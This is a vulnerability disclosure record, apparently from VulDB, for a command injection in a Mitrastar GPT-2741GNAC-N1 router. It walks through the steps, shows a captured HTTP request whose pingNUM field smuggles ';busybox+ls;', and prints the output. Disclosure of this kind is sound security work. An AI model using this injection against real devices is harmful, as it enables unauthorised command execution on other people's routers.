| Title | Mitrastar GPT-2741GNAC-N1 BR_g7.9_1.11(WVK.0)b42 Command Injection |
|---|
| Description | PoC
1. Authenticate in login page http://192.168.15.1/cgi-bin/sophia_index.cgi
2. Click in Management > Utilities
3. We will have ping tool
4. put an IP and Number of pings
5. Intercept the request
Request example Bellow
POST /cgi-bin/device-management-utilities-internet.cgi HTTP/1.1
Host: 192.168.15.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 59
Origin: http://192.168.15.1
Connection: close
Referer: http://192.168.15.1/cgi-bin/sophia_index.cgi
Cookie: COOKIE_SESSION_KEY=4f56ca0657f404002f44aab543868f13
wanPVCFlag=0&PINGFlag=1&pingIPAddr=192.168.15.111&pingNUM=1;busybox+ls;
6. The parameter "pingNUM" is vulnerable to command injection, if we use ; after number 1 we can concat commands
route use busybox to execute commands, so we gonna usa ;busybox+ls; for example
Output
Usage: ping [OPTIONS] HOST
2tiers.html
2tiers_save.asp
Aviso.cgi
DNSSEC.cgi
DNSSEC_add.cgi
DiagGeneral.cgi
Fireware_UpgradesManaged.cgi
GVT_portForwarding_rule.cgi
IP_Find_LanHostMac.cgi
IP_MAC_Filter.cgi
IPv6_MAC_Filter.cgi
Instalacion.cgi
InstalacionWizard
...
if necessary more evidences please contact me |
|---|
| Source | ⚠️ http://192.168.15.1/cgi-bin/sophia_index.cgi |
|---|
| User | Dhimitri (ID 45045) |
|---|
| Submission | 2024-05-08 06:17 (12 days ago) |
|---|
| Moderation | 2024-05-15 13:07 (7 days later) |
|---|
| Status | Duplicate |
|---|
| VulDB Entry | 230803 |
|---|